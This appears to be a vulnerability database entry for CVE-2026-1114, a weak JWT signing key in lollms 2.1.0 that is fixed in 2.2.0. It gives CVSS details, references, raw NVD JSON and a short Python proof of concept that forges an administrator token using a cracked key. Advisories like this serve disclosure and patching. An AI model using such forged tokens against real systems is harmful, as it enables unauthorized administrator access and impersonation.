Security Vulnerability Report
CVE-2026-1114 CVSS 9.8 CRITICAL

CVE-2026-1114

Published: 2026-04-07 07:16:24
Last Modified: 2026-04-28 00:00:30

Description

In parisneo/lollms version 2.1.0, the application's session management is vulnerable to improper access control due to the use of a weak secret key for signing JSON Web Tokens (JWT). This vulnerability allows an attacker to perform an offline brute-force attack to recover the secret key. Once the secret key is obtained, the attacker can forge administrative tokens by modifying the JWT payload and resigning it with the cracked secret. This enables unauthorized users to escalate privileges, impersonate the administrator, and gain access to restricted endpoints. The issue is resolved in version 2.2.0.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:lollms:lollms:2.1.0:*:*:*:*:*:*:* - VULNERABLE
parisneo/lollms 2.1.0
parisneo/lollms < 2.2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import datetime

import jwt  # PyJWT (pip install PyJWT)

# PoC: Forging an admin token using a weak secret key.
# This script simulates the step after the attacker has cracked the weak key via brute force.


def forge_admin_token(weak_secret):
    # Timezone-aware timestamps; PyJWT converts datetime values in "iat"/"exp" to epoch seconds
    now = datetime.datetime.now(datetime.timezone.utc)
    # Payload modified to escalate privileges to Administrator
    payload = {
        "user_id": 1,
        "username": "admin",
        "role": "administrator",
        "iat": now,
        "exp": now + datetime.timedelta(hours=24),
    }
    # Generate a new JWT signed with the cracked weak secret.
    # Algorithm is typically HS256 for this type of vulnerability.
    forged_token = jwt.encode(payload, weak_secret, algorithm="HS256")
    return forged_token


if __name__ == "__main__":
    # In a real attack, this key is derived from offline cracking
    cracked_weak_key = "123456"
    print("[+] Attempting to forge admin token with weak key...")
    admin_token = forge_admin_token(cracked_weak_key)
    print(f"[+] Forged Token: {admin_token}")
    print("[+] Attacker can now use this token to access administrative endpoints.")

References

Patch: https://github.com/parisneo/lollms/commit/a3b2b82b84d537a9da63e63a370a6a8ad55fed34
Exploit, Third Party Advisory: https://huntr.com/bounties/608b2a3b-2225-438e-9e61-ffbfdec2ed89
Weakness: CWE-284 (Improper Access Control)
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-1114",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-07T07:16:23.633",
    "lastModified": "2026-04-28T00:00:29.800",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "In parisneo/lollms version 2.1.0, the application's session management is vulnerable to improper access control due to the use of a weak secret key for signing JSON Web Tokens (JWT). This vulnerability allows an attacker to perform an offline brute-force attack to recover the secret key. Once the secret key is obtained, the attacker can forge administrative tokens by modifying the JWT payload and resigning it with the cracked secret. This enables unauthorized users to escalate privileges, impersonate the administrator, and gain access to restricted endpoints. The issue is resolved in version 2.2.0."
      }
    ],
    "metrics": {
      "cvssMetricV30": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.0",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-284"}]
      },
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [{"lang": "en", "value": "NVD-CWE-Other"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:lollms:lollms:2.1.0:*:*:*:*:*:*:*",
                "matchCriteriaId": "C17EE607-0C5D-4186-AFFB-93818FA92252"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/parisneo/lollms/commit/a3b2b82b84d537a9da63e63a370a6a8ad55fed34",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://huntr.com/bounties/608b2a3b-2225-438e-9e61-ffbfdec2ed89",
        "source": "[email protected]",
        "tags": ["Exploit", "Third Party Advisory"]
      },
      {
        "url": "https://huntr.com/bounties/608b2a3b-2225-438e-9e61-ffbfdec2ed89",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "tags": ["Exploit", "Third Party Advisory"]
      }
    ]
  }
}